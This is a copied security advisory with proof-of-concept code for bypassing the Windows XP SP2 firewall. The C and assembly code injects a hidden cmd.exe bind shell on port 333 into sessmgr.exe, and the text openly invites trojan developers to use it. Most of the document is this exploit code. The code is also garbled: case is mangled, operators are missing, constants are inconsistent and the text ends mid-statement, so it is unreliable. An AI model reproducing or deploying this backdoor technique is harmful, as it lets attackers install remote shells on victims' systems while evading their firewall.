Bypassing XP SP2 Firewall Code Summary
Windows XP Service Pack 2 incorporates many enhancements to try to better protect systems from malware and other forms of attacks. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this Firewall is the ability to allow users to decide what applications can listen on the network. By allowing users to control what applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate and in fact it is very Easy for Locally Executing Code to Bypass The Windows Firewall. So Don't worry you aspiring Trojan Developers, Your Still Going to Be Aable To Trojan Consumer And Corporate Systems To your Hearts Content.
Attached to this advisory is proof of concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test if the Firewall Has Been Bypassed (IT IS!) Telnet from another machine to the target machine on port 333 and if your connection
Details Exploit: #include
Void SetFP (CHAR * BUFFER, INT SZ, DWORD FROM, DWORD FP) {INT i; for (i = 0; i int injcode (char * buffer) {HMODULE ws2_32; DWORD _loadlibrarya, _createprocessa, _wsastartup, _wsasocketa, _bind, _listen, _accept, _sleep; char * code; int len; ws2_32 = LoadLibrary ( "ws2_32"); _ loadlibrarya = (DWORD) GetProcAddress (GetModuleHandle ( "kernel32"), "LoadLibraryA"); _ createprocessa = (DWORD) GetProcAddress (GetModuleHandle ( "kernel32"), "CreateProcessA"); _ sleep = (DWORD) GetProcAddress (GetModuleHandle ( "kernel32"), "Sleep") ; _wsastartup = (DWORD) GetProcAddress (ws2_32, "WSAStartup"); _ wsasocketa = (DWORD) GetProcAddress (ws2_32, "WSASocketA"); _ bind = (DWORD) GetProcAddress (ws2_32, "bind"); _ listen = (DWORD) GetProcAddress ( WS2_32, "listen"); _ accept = (dword) getProcaddress (WS2_32, "accept"); __ asm {call over Push '23'push' _2sw'push Espmov Eax, 0x11111111Call EAX XOR EBX, EBXPUSH 0X64POP EBXWSADATA: PUSH EBXLOOP WSADATAPUSH ESPUSH 0X101MOV EAX, 0X33333333Call EAX Push EBXPUSH EBXPUSH EBXPUSH EBXPUSH SOCK_STREAMPUSH AF_INETMOV EAX, 0x44444444Call ESIV ESI, ESI Push ebxpush ebxpush ebxpush 0x4d010002 / * port 333 * / MOV EAX, ESPPUSH 0x10push Eaxpush Esimov Eax, 0x5555555Call EAX Push SomaxConnpush Esimov Eax, 0x6666666Call EAX Push Ebxpush Ebxpush Esimov Eax, 0x77777777Call Eaxmov Edi, EAX push ebxpush ebxpush ebxpush ebxmov eax, esppush edipush edipush edipush ebxpush SW_HIDEpush STARTF_USESTDHANDLESpush 0xApop ecxstartupinfo: push ebxloop startupinfopush 0x44mov ecx, esppush 'dmc'mov edx, esp Push Eaxpush ECXPUSH EBXPUSH EBXPUSH EBXPUSH 1PUSH EBXPUSH EBXPUSH EDXPUSH EBXMOV EAX, 0X22222222CALL EAX Push Infinitemov Eax, 0x8888888Call EAX OVER: POP Eaxmov Code, EAX} len = 0xA0; memcpy (buffer, code, len); setfp (buffer, len, 0x11111111, _loadlibrarya); setfp (buffer, len, 0x22222222, _createprocessa); setfp (buffer, len, 0x33333333, _wsastartup); setfp (buffer, len, 0x44444444, _wsasocketa); setfp (buffer, len, 0x55555555, _bind); setfp (buffer, len, 0x66666666, _listen); setfp (buffer, len, 0x77777777, _accept); setfp (buffer, len, 0x88888888, _sleep) Return Len;} void main (void) {STARTUPINFO sinfo; PROCESS_INFORMATION pinfo; CONTEXT context; LDT_ENTRY sel; DWORD read, tib, peb, exebase, peoffs, ep; IMAGE_NT_HEADERS pehdr; int len; char sessmgr [MAX_PATH 13]; char buffer [2048] ; GetSystemDirectory; sessmgr [max_path] = 0; strcat (sessmgr, "// sessmgr.exe"); MEMSET (& SINFO, 0, SIZEOF (SINFO)); sinfo.cb = sizeof (sinfo); IF (! CreateProcess (sessmgr, null, null, null, false, create_suspended, null, null, & sinfo, & pinfo) Printf ("CreateProcess Failed"), exit (1); context.ContextFlags = CONTEXT_FULL; GetThreadContext (pinfo.hThread, & context); GetThreadSelectorEntry (pinfo.hThread, context.SegFs, & sel); tib = sel.BaseLow | (sel.HighWord.Bytes.BaseMid << 16) | (sel. HighWord.Bytes.BaseHi << 24); ReadProcessMemory (pinfo.hProcess, (LPCVOID) (tib 0x30), & peb, 4, & read); ReadProcessMemory (pinfo.hProcess, (LPCVOID) (peb 0x08), & exebase, 4 , & read); ReadProcessMemory (pinfo.hProcess, (LPCVOID) (exebase 0x3C), & peoffs, 4, & read); ReadProcessMemory (pinfo.hProcess, (LPCVOID) (exebase peoffs), & pehdr, sizeof (pehdr), & read); ep = exebase pehdr.optionalheader.addressofentrypoint; Len = Injcode (buffer); VirtualProtect ((LPVOID) EP, LEN, PAGE_EXECUTE_READWRITE, & Read); WriteProcessMemory (Pinfo.hprocess, (LPVOID) EP, Buffer, Len, & Read; ResMethread (Pinfo.hthread);
